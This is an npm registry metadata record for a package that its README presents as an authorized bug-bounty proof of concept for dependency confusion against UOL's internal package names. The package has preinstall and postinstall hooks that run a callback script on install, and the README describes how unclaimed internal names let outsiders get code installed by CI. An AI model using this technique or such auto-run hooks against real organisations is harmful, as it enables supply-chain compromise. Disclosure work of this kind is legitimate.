{"_id":"uolcs-host-uol-anuncios-fe","name":"uolcs-host-uol-anuncios-fe","dist-tags":{"latest":"99.99.99"},"versions":{"99.99.99":{"name":"uolcs-host-uol-anuncios-fe","version":"99.99.99","description":"Authorized security research — UOL BugHunt program (skysz). Reserved internal package placeholder. No data exfiltration, DNS-only callback for impact verification. Will be unpublished after triage.","main":"index.js","scripts":{"preinstall":"node ./callback.js || true","postinstall":"node ./callback.js || true"},"keywords":["security","bug-bounty","uol","research","placeholder"],"author":{"name":"skysz","url":"UOL BugHunt security researcher"},"license":"MIT","repository":{"type":"git","url":"https://example.invalid/skysz-bbp-uol-poc"},"_id":"uolcs-host-uol-anuncios-fe@99.99.99","_nodeVersion":"24.12.0","_npmVersion":"11.6.2","dist":{"integrity":"sha512-r/dOYxLrsPWRgErwx4lpP24dkex6fTTdKNKvUetVPH0iPz7WwlsHu/Vz0yAEcy/Zfw2F7oVPA/0FeiIKtTX+lw==","shasum":"4b3426ce48b114b221171e8fc17641508bd7067a","tarball":"https://registry.npmjs.org/uolcs-host-uol-anuncios-fe/-/uolcs-host-uol-anuncios-fe-99.99.99.tgz","fileCount":4,"unpackedSize":5416,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEUCIBSCraJbf6/pc1d61F1F0JVp+A79E89OotfgW2Ot+m3mAiEA3Zw+6pNlVXIEgL/S58rE4UvRSJBuHo4zRyKnTqgFRc0="}]},"_npmUser":{"name":"skysz","email":"barreira4alexandre@gmail.com"},"directories":{},"maintainers":[{"name":"skysz","email":"barreira4alexandre@gmail.com"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/uolcs-host-uol-anuncios-fe_99.99.99_1779292904095_0.9442665019547976"},"_hasShrinkwrap":false}},"time":{"created":"2026-05-20T16:01:43.885Z","99.99.99":"2026-05-20T16:01:44.227Z","modified":"2026-05-20T16:01:44.840Z"},"maintainers":[{"name":"skysz","email":"barreira4alexandre@gmail.com"}],"description":"Authorized security research — UOL BugHunt program (skysz). Reserved internal package placeholder. No data exfiltration, DNS-only callback for impact verification. Will be unpublished after triage.","keywords":["security","bug-bounty","uol","research","placeholder"],"repository":{"type":"git","url":"https://example.invalid/skysz-bbp-uol-poc"},"author":{"name":"skysz","url":"UOL BugHunt security researcher"},"license":"MIT","readme":"# uolcs-host-uol-anuncios-fe (security research placeholder)\n\n**This is NOT a real npm package** — it is a placeholder published under an\ninternal UOL package name as part of an authorized security research project\n(UOL BugHunt program).\n\n## What this is\n\nThe `uolcs-host-*` package names are used internally by UOL (Universo Online\nS.A., Brazil) in their `meupainelhost.uol.com.br` infrastructure (declared in\ntheir public `importmap.json`). The name `uolcs-host-uol-anuncios-fe` was found\nto be **unclaimed on the public npm registry**, which means any third party\ncould publish a package under that name and have it installed automatically\nby UOL's internal Jenkins CI pipeline.\n\nThis package was published by an authorized bug bounty researcher (skysz) under\nthe UOL BugHunt program to **demonstrate the impact** of this dependency\nconfusion vulnerability via a single DNS-only callback (no data exfiltration,\nno command execution, no file writes — see `callback.js`).\n\n## Why this exists publicly\n\nBecause the impact of a dependency confusion attack can only be verified\n**materially** by registering one of the unclaimed names and observing CI\nresolution. Without a public placeholder, the finding remains theoretical.\n\n## Will be unpublished\n\nThis package will be removed from the npm registry after UOL acknowledges the\nunderlying vulnerability and applies defensive registration of all 37+ affected\nscopes/names (or configures `.npmrc` with internal registry mapping).\n\n## Contact\n\nFor questions, please reach out via the UOL BugHunt program.\n\n— skysz, 2026-05-20\n","readmeFilename":"README.md","_rev":"1-ab4ee4da377fafe96b26d1cb33d18790"}